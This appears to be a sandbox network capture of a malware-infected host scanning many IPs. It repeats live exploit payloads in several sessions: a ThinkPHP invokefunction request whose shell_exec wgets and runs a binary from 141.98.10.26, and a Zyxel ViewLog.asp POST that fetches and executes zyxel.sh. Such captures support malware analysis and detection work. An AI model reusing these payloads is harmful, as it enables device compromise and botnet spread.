Nov 22, 2023 08:38:19.765664101 CET	3573	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.23	44440	95.136.38.136	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:19.602334976 CET	3567	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:19.797424078 CET	3574	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.23	38092	95.217.192.10	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:19.602811098 CET	3568	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:19.797440052 CET	3574	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.23	51394	95.163.137.60	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:19.619645119 CET	3569	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:19.832192898 CET	3575	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:19 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.23	53568	95.86.197.122	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:19.636162043 CET	3569	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.23	36602	112.126.223.165	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.062657118 CET	3638	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:20.363899946 CET	3741	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:18 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.23	47382	112.125.209.44	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.068876982 CET	3639	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:20.376471043 CET	3752	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:19 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.23	37760	112.124.64.181	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.072122097 CET	3639	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:20.383984089 CET	3752	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:20 GMT Server: Apache Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.23	60524	94.242.229.167	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.152656078 CET	3641	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.23	34690	112.135.199.44	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.165353060 CET	3642	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:20.536392927 CET	3763	IN	HTTP/1.1 404 Not Found Content-type: text/html Content-Length: 0 Connection: close AuthInfo:

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.23	51108	31.136.242.58	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.211572886 CET	3653	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:20.783641100 CET	3771	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.903547049 CET	3825	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.271220922 CET	4135	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:28.878475904 CET	4729	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:37.837254047 CET	5729	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.290513992 CET	8190	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.149327040 CET	12634	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.23	49650	31.136.110.141	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.211893082 CET	3653	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:20.783642054 CET	3771	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.935488939 CET	3826	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.271222115 CET	4135	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:28.878480911 CET	4729	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.093234062 CET	5801	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.290468931 CET	8188	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.149338961 CET	12634	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.23	44002	94.122.123.68	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.257225990 CET	3717	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.23	38290	62.29.66.160	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.257272959 CET	3717	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.23	50004	31.136.63.138	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.395550966 CET	3754	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:20.975788116 CET	3774	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
